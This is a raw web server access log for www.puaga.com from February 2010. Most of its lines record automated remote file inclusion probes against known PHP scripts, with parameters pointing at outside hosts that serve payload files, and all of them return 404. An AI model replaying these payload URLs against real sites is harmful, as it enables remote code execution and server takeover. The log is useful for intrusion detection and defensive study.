80.172.236.41 - - [20/Feb/2010:06:21:14 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:21:14 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:21:26 -0800] "GET /logs/access_100119.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:21:26 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:21:26 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:21:35 -0800] "GET /logs/access_100121.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:21:35 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:21:35 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:21:35 -0800] "GET /logs/access_100130.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:42 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:42 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:42 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:48 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:48 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:21:48 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:21:54 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:21:54 -0800] "GET /logs/access_100202.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:21:54 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:03 -0800] "GET /logs/access_100202.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:03 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:03 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:22:07 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:22:12 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:24 -0800] "GET /logs/access_100202.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:24 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:24 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:22:25 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:26 -0800] "GET /logs/access_100202.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:26 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:26 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:22:27 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:22:27 -0800] "GET /logs/access_100117.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:22:27 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:22:36 -0800] "GET /logs/access_100130.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:22:36 -0800] "GET /logs/access_100121.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:22:36 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:22:41 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:22:44 -0800] "GET /logs//cronjobs/move_articles.php?cfg[path][contenido]=http://www.fileden.com/files/2010/2/18/2765513/a.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:22:44 -0800] "GET /cronjobs/move_articles.php?cfg[path][contenido]=http://www.fileden.com/files/2010/2/18/2765513/a.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:46 -0800] "GET /logs/access_100127.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:22:46 -0800] "GET /logs/access_100127.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:22:49 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:06:22:54 -0800] "GET /logs/access_100124.log%20%20//cronjobs/move_articles.php?cfg[path][contenido]=http://www.fileden.com/files/2010/2/18/2765513/a.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.179.83 - - [20/Feb/2010:06:23:05 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:23:25 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:23:25 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:23:25 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:23:44 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [20/Feb/2010:06:23:46 -0800] "GET /ideal/forum/viewtopic.php?p HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "puaga.com"
222.237.78.176 - - [20/Feb/2010:06:23:53 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.182.11 - - [20/Feb/2010:06:23:55 -0800] "GET /ideal/forum/viewtopic.php?p=15461 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:24:18 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:25 -0800] "GET /logs/access.log%20%20//album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:25 -0800] "GET /album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:25 -0800] "GET /logs//album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:25 -0800] "GET /logs/access_100202.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:25 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:25 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:27 -0800] "GET /album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:27 -0800] "GET /logs/access.log%20%20//album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:24:27 -0800] "GET /logs//album.php?SECURITY_FILE=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:34 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:34 -0800] "GET /logs/access_100202.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:34 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:37 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:37 -0800] "GET /logs/access_100202.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:37 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:38 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:38 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:38 -0800] "GET /logs/access_100202.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:24:38 -0800] "GET /errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:24:38 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:24:39 -0800] "GET /logs/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:56 -0800] "GET /logs/access_100127.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:24:57 -0800] "GET /logs/access_100127.log//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:31 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:31 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:31 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:32 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:32 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:32 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:34 -0800] "GET /logs/access_100124.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:34 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:34 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:40 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:40 -0800] "GET /logs/access_100124.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:40 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:25:46 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:52 -0800] "GET /logs/access_100127.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:52 -0800] "GET /logs/access_100127.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:53 -0800] "GET /logs/access_100127.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:25:59 -0800] "GET /logs/access_100127.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:26:41 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:26:45 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:26:45 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:26:45 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:26:58 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:26:58 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:26:58 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:27:00 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:27:00 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:27:00 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:27:00 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:27:16 -0800] "GET /logs/access_100211.log//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:27:18 -0800] "GET /logs/access_100126.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:27:20 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:27:22 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:27:51 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:29:31 -0800] "GET /logs/access_100130.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:29:33 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:29:34 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:29:55 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://218.208.21.7/albums/album102/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:30:28 -0800] "GET /logs/access_100130.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:30:30 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
